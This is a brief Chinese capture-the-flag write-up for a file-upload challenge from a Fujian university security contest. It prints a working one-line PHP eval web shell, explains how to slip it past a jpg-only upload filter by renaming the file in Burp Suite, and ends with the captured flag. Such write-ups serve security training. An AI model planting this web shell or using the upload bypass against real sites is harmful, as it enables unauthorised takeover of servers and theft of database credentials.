题目名称 第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?
上传文件,多次尝试发现只能上传jpg文件 考虑为白名单绕过
构造hack.php
内容为一句话木马
<?php @eval($_POST['cmd'])?>
注意大小写 不要写成post 因为php是区分大小写的
改后缀为jpg上传 burpsuite再抓包修改文件名为hack.php
gogogo 成功上传
输入url 密码连接成功后 找到数据库账户密码
右键
可找到flag文件 点击执行 最后得到flag
flag{5f15dc82-f2f0-47b1-8f68-5aabf63cb973}